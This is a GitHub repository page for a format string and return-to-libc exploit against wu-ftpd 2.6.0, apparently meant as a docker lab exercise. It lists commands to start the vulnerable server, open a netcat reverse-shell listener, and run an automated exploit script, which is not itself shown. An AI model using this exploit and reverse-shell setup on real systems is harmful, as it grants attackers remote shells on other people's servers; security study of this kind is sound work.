Optixal / wuftpd-format-string

Format string exploit + return-to-libc attempt targeting wuftpd 2.6.0 on Ubuntu 12.04.5 LTS x86

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

wu-ftpd 2.6.0 SITE EXEC Format String Exploit

# wu-ftpd 2.6.0, in one terminal
docker run --privileged -it --rm -p 21:21 smuxcs/wu-ftpd-32-shellcode-canary-aslr:2.6.0

# Ubuntu or any other OS, in another terminal
docker run -it --rm ubuntu:latest # for getting a reverse shell, ensure this container has an IP of 172.17.0.5 or change the shellcode in exploit_automated.py
apt-get install netcat
nc -lvnp 7777 # listen on TCP 7777, if you want to change, change the shellcode in exploit_automated.py

# On host machine, in another terminal
./exploit_automated.py localhost 21

About

Format string exploit + return-to-libc attempt targeting wuftpd 2.6.0 on Ubuntu 12.04.5 LTS x86

License:MIT License


Languages

Language:Python 97.4%Language:C 2.6%